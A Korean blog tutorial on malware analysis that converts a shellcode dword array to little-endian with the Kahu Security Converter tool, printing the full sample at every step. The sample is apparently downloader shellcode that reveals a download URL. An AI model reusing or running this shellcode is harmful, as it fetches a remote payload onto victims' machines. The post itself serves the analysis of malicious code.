[분석툴] Converter Tool을 이용하여 특정 데이터를 리틀엔디언(Little-Endian)으로 변환하는 방법



분석을 하다보면 HEX 값을 ASCII로 변환 해야 하는 경우가 다수 있다.

보통 ShellCode를 살펴보다 보면 이런 값들을 많이 보게 되는데 한가지 예시를 들어보자.


0x68FFFFFE, 0x3A707474 -> 이 값을 ASCII로 변환해 보면 "h  ?ptt" 이러한 값이 보여진다.

유추 해 보자면 이 값은 "http:" 를 나타나는 HEX 값일 것이다.


그럼 리틀엔디언(Little-Endian) 방식으로 값을 변환 해서 아래와 같은 값으로 바꾸면 된다.

(※ 변환값을 알기 쉽도록 2바이트마다 (숫자)로 표기함)


0x68(1)FF(2)FF(3)FE(4), 0x3A(1)70(2)74(3)74(4) : (원본)

                             

0xFE(4)FF(3)FF(2)68(1), 0x74(4)74(3)70(2)3A(1) : (변환)


위의 예시에서 말하듯이 어떠한 특정 데이터를 리틀엔디언 형식으로 바꾸는건 어렵지 않다.

하지만 그 데이터가 방대하다면??? 


사람의 손으로 한다는건 정말 말도 안된다!! 


그래서 디코딩 툴로 유명한 kahusecurity 의 Converter Tool을 이용하여 변환하는 방법을 알아보자!!

※ 준비물

- kahusecurity Converter Tool : http://www.kahusecurity.com/tools


- malzilla_1.2.0 : http://malzilla.sourceforge.net


- Converter Data (※ Data는 3.20 유사 샘플에서 인용하였음)

0x50EC8360, 0xE34B8B68, 0xED49685F, 0x29687E0F, 0x6857E844, 0x5B8ACA33, 0x46C61B68, 0xFE726879, 0xFB6816B3, 0x680FFD97, 0xE80A791F, 0x0117A568, 0x4E8E687C, 0xCC8BEC0E, 0x00008BE9, 0x33FC5600, 0x528B64D2, 0x0C528B30, 0x8B14528B, 0xC0332872, 0x000018B8, 0x33595000, 0xACC033FF, 0x027C613C, 0xCFC1202C, 0xE2F8030D, 0x5BFF81F0, 0x8B6A4ABC, 0x128B105A, 0xC38BD575, 0x8B60C35E, 0x3C558BEA, 0x7815448B, 0xD08BC503, 0x8B18488B, 0xDD032058, 0x8B4934E3, 0xF5038B34, 0xC033FF33, 0xC084ACFC, 0xCFC10774, 0xEBF8030D, 0x247C3BF4, 0x8BE17528, 0xDD03245A, 0x4B0C8B66, 0x031C5A8B, 0x8B048BDD, 0x4489C503, 0xC3611C24, 0x50AD39EB, 0xFFA8E852, 0x0789FFFF, 0x8308C483, 0xF13B04C7, 0x5EC3EC75, 0xF0B0C033, 0xEC8BE02B, 0x51407589, 0xFFFF4CE8, 0xD08B59FF, 0x05EB02EB, 0xFFFFF9E8, 0x458958FF, 0xE905EB2C, 0x00000081, 0x4EFEF18B, 0x047D8D06, 0xC183CE8B, 0xFFB0E81C, 0xC183FFFF, 0x6E01B80C, 0xF8C17465, 0x77685008, 0x8B696E69, 0x535251DC, 0x5A0455FF, 0xE8D08B59, 0xFFFFFF8E, 0x5050C033, 0xFF505050, 0x45892055, 0x20458D34, 0x0040B850, 0xB8500000, 0x00004000, 0x2C458B50, 0x0010002D, 0x55FF5000, 0xB8C03318, 0x00008000, 0x50C03350, 0x5D8B5050, 0x75FF5340, 0x2455FF34, 0x840FC085, 0x000000D2, 0xEB384589, 0x8D35EB02, 0x33567F75, 0x5030B0C0, 0x8B1C55FF, 0xC7C033D8, 0x61781E04, 0x44C76975, 0x636F041E, 0x44C76E6F, 0x2E66081E, 0x44C67865, 0x88650C1E, 0x890D1E44, 0x02EB3075, 0xB05067EB, 0x02B05002, 0x50C03250, 0xC140B050, 0x565018E0, 0x830855FF, 0x7A74FFF8, 0x333C4589, 0x0CB866C0, 0x8BE02B01, 0x045E8DF4, 0x04B86653, 0x468D5001, 0x75FF5008, 0x2855FF38, 0x8504468B, 0x331674C0, 0x468D50C0, 0x76FF5004, 0x08468D04, 0x3C75FF50, 0xEB0C55FF, 0x3C75FFD0, 0x331055FF, 0x0CB866C0, 0xEBE00301, 0x3333EB02, 0x2B54B1C9, 0x33FC8BE1, 0x8BAAF3C0, 0x4407C6FC, 0x5644778D, 0x50505057, 0xFF505050, 0xFF503075, 0xC4811455, 0x000001C4, 0xC481C361, 0x00000170, 0x7CE8C361, 0x68FFFFFE, 0x3A707474, 0x77772F2F, 0x64732E77, 0x69616667, 0x632E6874, 0x662F6D6F, 0x73656C69, 0x766E652F, 0x616D692F, 0x6A2F6567, 0x662F6770, 0x74737269, 0x6669672E, 0x00000000



0. Converter Data 변환

우선 Data를 보면, 0x00000000 형식으로 되어있다.

이 데이터를 우리는 변환이 가능하도록 "0x" , "," 문구를 모두 없애는 작업이 우선이다.

(문구를 없앨때에는 Editor 프로그램 아무거나 써도 된다.)

50EC8360E34B8B68ED49685F29687E0F6857E8445B8ACA3346C61B68FE726879FB6816B3680FFD97E

80A791F0117A5684E8E687CCC8BEC0E00008BE933FC5600528B64D20C528B308B14528BC03328720

00018B833595000ACC033FF027C613CCFC1202CE2F8030D5BFF81F08B6A4ABC128B105AC38BD575

8B60C35E3C558BEA7815448BD08BC5038B18488BDD0320588B4934E3F5038B34C033FF33C084ACF

CCFC10774EBF8030D247C3BF48BE17528DD03245A4B0C8B66031C5A8B8B048BDD4489C503C3611C

2450AD39EBFFA8E8520789FFFF8308C483F13B04C75EC3EC75F0B0C033EC8BE02B51407589FFFF4CED

08B59FF05EB02EBFFFFF9E8458958FFE905EB2C000000814EFEF18B047D8D06C183CE8BFFB0E81CC18

3FFFF6E01B80CF8C17465776850088B696E69535251DC5A0455FFE8D08B59FFFFFF8E5050C033FF50

50504589205520458D340040B850B8500000000040002C458B500010002D55FF5000B8C033180000

800050C033505D8B505075FF53402455FF34840FC085000000D2EB3845898D35EB0233567F755030

B0C08B1C55FFC7C033D861781E0444C76975636F041E44C76E6F2E66081E44C6786588650C1E890D

1E4402EB3075B05067EB02B0500250C03250C140B050565018E0830855FF7A74FFF8333C45890CB86

6C08BE02B01045E8DF404B86653468D500175FF50082855FF388504468B331674C0468D50C076FF5

00408468D043C75FF50EB0C55FF3C75FFD0331055FF0CB866C0EBE003013333EB022B54B1C933FC8

BE18BAAF3C04407C6FC5644778D50505057FF505050FF503075C4811455000001C4C481C361000001

707CE8C36168FFFFFE3A70747477772F2F64732E7769616667632E6874662F6D6F73656C69766E652

F616D692F6A2F6567662F6770747372696669672E00000000



1. USC2 to Hex 된 데이터

Converter Tool 을 이용하여 Converter Data 를 input에 입력 후 USC2 to Hex 클릭 한다.

 


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

EC5060834BE3688B49ED5F6868290F7E576844E88A5B33CAC646681B72FE796868FBB3160F6897FD

0AE81F79170168A58E4E7C688BCC0EEC0000E98BFC3300568B52D264520C308B148B8B5233C0722

80000B81859330050C0ACFF337C023C61C1CF2C20F8E20D03FF5BF0816A8BBC4A8B125A108BC375

D5608B5EC3553CEA8B15788B448BD003C5188B8B4803DD5820498BE33403F5348B33C033FF84C0F

CACC1CF7407F8EB0D037C24F43BE18B287503DD5A240C4B668B1C038B5A048BDD8B894403C561C

3241CAD50EB39A8FF52E88907FFFF088383C43BF1C704C35E75ECB0F033C08BEC2BE040518975FFFFE

84C8BD0FF59EB05EB02FFFFE8F98945FF5805E92CEB00008100FE4E8BF17D04068D83C18BCEB0FF1CE

883C1FFFF016E0CB8C1F8657468770850698B696E5253DC51045AFF55D0E8598BFFFF8EFF505033C0

50FF5050894555204520348D400050B850B8000000000040452C508B10002D00FF550050C0B818330

0000080C05050338B5D5050FF754053552434FF0F8485C00000D20038EB8945358D02EB5633757F30

50C0B01C8BFF55C0C7D8337861041EC74475696F631E04C7446F6E662E1E08C644657865881E0C0D

89441EEB02753050B0EB67B0020250C050503240C150B05056E0180883FF55747AF8FF3C338945B80

CC066E08B012B5E04F48DB80453668D460150FF750850552838FF04858B461633C0748D46C050FF7

604504608048D753C50FF0CEBFF55753CD0FF1033FF55B80CC066E0EB0103333302EB542BC9B1FC33

E18BAA8BC0F30744FCC644568D775050575050FF505050FF753081C455140000C40181C461C30000

7001E87C61C3FF68FEFF703A747477772F2F7364772E616967662E6374682F666F6D6573696C6E762

F656D612F692F6A67652F6670677374697269662E6700000000



2. Swap (6 Chars 2 Positons)

1번에 나온 Data의 순서를 Swap 버튼으로 바꿀 수 있다.

6 Chars 2 Positons 는 6개의 문자열을 2개의 위치씩 변환시키라는 뜻이다.


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

6050EC8368E34B8B5FED49680F29687E446857E8335B8ACA6846C61B79FE7268B3FB681697680FFD

1FE80A79680117A57C4E8E680ECC8BECE900008B0033FC56D2528B64300C528B8B8B145272C03328B

800001800335950FFACC0333C027C612CCFC1200DE2F803F05BFF81BC8B6A4A5A128B1075C38BD5

5E8B60C3EA3C558B8B78154403D08BC58B8B184858DD0320E38B493434F5038B33C033FFFCC084A

C74CFC1070DEBF803F4247C3B288BE1755ADD0324664B0C8B8B031C5ADD8B048B034489C524C3

611CEB50AD3952FFA8E8FF0789FF838308C4C7F13B04755EC3EC33F0B0C02BEC8BE089514075E8FFF

F4CFFD08B59EB05EB02E8FFFFF9FF4589582CE905EB810000008B4EFEF106047D8D8BC183CE1CFFB0

E8FFC183FF0C6E01B865F8C17408776850698B696EDC535251FF5A045559E8D08B8EFFFFFF335050

C050FF5050554589203420458D500040B800B8500000000040502C458B2D0010000055FF5018B8C03

3000000805050C033505D8B504075FF53342455FF85840FC0D200000089EB3845028D35EB7533567F

C05030B0FF8B1C55D8C7C0330461781E7544C7691E636F046F44C76E1E2E66086544C6781E88650C

44890D1E7502EB30EBB050670202B0505050C03250C140B0E0565018FF830855F87A74FF89333C45C

00CB866018BE02BF4045E8D5304B86601468D500875FF50382855FF8B850446C0331674C0468D500

476FF500408468D503C75FFFFEB0C55D03C75FFFF331055C00CB86601EBE003023333EBC92B54B1E1

33FC8BC08BAAF3FC4407C68D5644775750505050FF505075FF503055C48114C400000161C481C370

000001617CE8C3FE68FFFF743A70742F77772F7764732E6769616674632E686F662F6D6973656C2F76

6E652F616D69676A2F6570662F67697473722E66696700000000



3. 2번 데이터를 다시 USC2 to Hex 

2번에서 나온 Data를 다시 input 창에 복사 한 후 USC2 to Hex 를 클릭한다.

 


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

506083ECE3688B4BED5F6849290F7E686844E8575B33CA8A46681BC6FE796872FBB316686897FD0F

E81F790A0168A5174E7C688ECC0EEC8B00E98B00330056FC52D2648B0C308B528B8B5214C072283

300B8180033005059ACFF33C0023C617CCF2C20C1E20D03F85BF081FF8BBC4A6A125A108BC375D5

8B8B5EC3603CEA8B55788B4415D003C58B8B8B4818DD5820038BE33449F5348B03C033FF33C0FCA

C84CF7407C1EB0D03F824F43B7C8B2875E1DD5A24034B668B0C038B5A1C8BDD8B044403C589C32

41C6150EB39ADFF52E8A807FFFF898383C408F1C7043B5E75ECC3F033C0B0EC2BE08B51897540FFE

84CFFD0FF598B05EB02EBFFE8F9FF45FF5889E92CEB05008100004E8BF1FE04068D7DC18BCE83FF1C

E8B0C1FFFF836E0CB801F86574C1770850688B696E6953DC51525AFF5504E8598BD0FF8EFFFF5033C

050FF5050504555208920348D450050B840B8000050000040002C508B45002D0010550050FFB81833

C000008000505033C05D50508B754053FF2434FF558485C00F00D20000EB8945388D02EB3533757F

5650C0B0308BFF551CC7D833C061041E78447569C7631E046F446F6EC72E1E0866446578C6881E0C

6589441E0D027530EBB0EB6750020250B0505032C0C150B04056E0185083FF55087AF8FF74338945

3C0CC066B88B012BE004F48D5E045366B84601508D750850FF2838FF55858B460433C0741646C050

8D760450FF08048D463C50FF75EBFF550C3CD0FF7533FF55100CC066B8EB0103E03302EB332BC9B15

433E18BFC8BC0F3AA44FCC607568D774450575050FF505050FF753050C455148100C40100C461C3

81007001007C61C3E868FEFFFF3A747470772F2F7764772E73696766616374682E666F6D2F73696C6

5762F656E612F696D6A67652F6670672F74697273662E676900000000



4. Swap (6 Chars 2 Positons)

3번에 나온 Data의 순서를 Swap 버튼으로 다시 바꾼다.


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

836050EC8B68E34B685FED497E0F2968E8446857CA335B8A1B6846C66879FE7216B3FB68FD97680F

791FE80AA5680117687C4E8EEC0ECC8B8BE90000560033FC64D2528B8B300C52528B8B142872C03

318B800005000335933FFACC0613C027C202CCFC1030DE2F881F05BFF4ABC8B6A105A128BD575C3

8BC35E8B608BEA3C55448B7815C503D08B488B8B182058DD0334E38B498B34F503FF33C033ACFC

C0840774CFC1030DEBF83BF4247C75288BE1245ADD038B664B0C5A8B031C8BDD8B04C50344891

C24C36139EB50ADE852FFA8FFFF0789C483830804C7F13BEC755EC3C033F0B0E02BEC8B75895140

4CE8FFFF59FFD08B02EB05EBF9E8FFFF58FF4589EB2CE90500810000F18B4EFE8D06047DCE8BC183E

81CFFB0FFFFC183B80C6E017465F8C1500877686E698B6951DC535255FF5A048B59E8D0FF8EFFFFC

03350505050FF50205545898D342045B85000400000B850400000008B502C45002D0010500055FF3

318B8C080000000335050C050505D8B534075FFFF342455C085840F00D200004589EB38EB028D35

7F753356B0C0503055FF8B1C33D8C7C01E046178697544C7041E636F6E6F44C7081E2E66786544C6

0C1E88651E44890D307502EB67EBB050500202B0325050C0B050C14018E0565055FF8308FFF87A74

4589333C66C00CB82B018BE08DF4045E665304B85001468D500875FFFF382855468B850474C03316

50C0468D500476FF8D040846FF503C7555FFEB0CFFD03C7555FF331066C00CB80301EBE0EB023333

B1C92B548BE133FCF3C08BAAC6FC4407778D5644505750505050FF503075FF501455C48101C4000

0C361C48101700000C3617CE8FFFE68FF74743A702F2F77772E776473666769616874632E6D6F662F

6C697365652F766E692F616D65676A2F6770662F72697473672E666900000000



5. 4번 데이터를 다시 USC2 to Hex 

4번에서 나온 Data를 다시 input 창에 복사 한 후 USC2 to Hex 를 클릭한다.

 


그럼 아래와 같이 최종적으로 Converter Data 를 얻을 수 있다.

6083EC50688B4BE35F6849ED0F7E682944E8576833CA8A5B681BC646796872FEB31668FB97FD0F68

1F790AE868A517017C688E4E0EEC8BCCE98B00000056FC33D2648B52308B520C8B52148B722833C

0B818000000505933FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B5A108B1275D58B

C35EC3608BEA8B553C8B44157803C58BD08B48188B582003DDE334498B348B03F533FF33C0FCAC

84C07407C1CF0D03F8EBF43B7C242875E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C589442

41C61C3EB39AD5052E8A8FFFFFF890783C40883C7043BF175ECC35E33C0B0F02BE08BEC89754051

E84CFFFFFF598BD0EB02EB05E8F9FFFFFF5889452CEB05E9810000008BF1FE4E068D7D048BCE83C11

CE8B0FFFFFF83C10CB8016E6574C1F808506877696E698BDC515253FF55045A598BD0E88EFFFFFF33

C05050505050FF55208945348D452050B84000000050B800400000508B452C2D0010000050FF55183

3C0B8008000005033C05050508B5D4053FF7534FF552485C00F84D2000000894538EB02EB358D757F

5633C0B03050FF551C8BD833C0C7041E78617569C7441E046F636F6EC7441E08662E6578C6441E0C6

588441E0D897530EB02EB6750B00250B0025032C05050B040C1E0185056FF550883F8FF747A89453

C33C066B80C012BE08BF48D5E045366B80401508D460850FF7538FF55288B460485C0741633C050

8D460450FF76048D460850FF753CFF550CEBD0FF753CFF551033C066B80C0103E0EB02EB3333C9B1

542BE18BFC33C0F3AA8BFCC607448D77445657505050505050FF753050FF551481C4C401000061C3

81C47001000061C3E87CFEFFFF687474703A2F2F7777772E73646766616974682E636F6D2F66696C6

5732F656E762F696D6167652F6A70672F66697273742E67696600000000






최종적으로 바뀌었다고는 하나 뭐가 틀린지 모르겠다는 분들을 위해 변환전과 변환후의 ASCII 값을 살펴보자.

(보통 HEX값을 ASCII로 볼 때에는 Malzilla 기능 중 Hew View Tab을 많이 이용한다)


■ 순서를 바꾸기 전에 Converter Data의 ASCII 값이다.

뭔가 의심스러운 URL 문자열이 보인다.


■ 순서를 바꾼 후 Converter Data의 ASCII 값이다.

정확히 다운로드 할 URL이 눈에 보인다.


인터넷을 찾아보니, 이렇게 임의의 데이터를 리틀엔디언(Little-Endian)으로 바꿔주는 툴이 존재하지 않았다.

물론 내가 못 찾은거 일 수도 있다. ㅡ.ㅡ;;

(아는 사람은 좀 알려주시길 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ)


그래도 이렇게 5번의 변환과정을 통해 바꾸는건 정말 귀찮은거 같다.

가능하면, 개발능력을 높여서 직접 툴을 만드는것을 추천한다!!

댓글(0)

Designed by JB FACTORY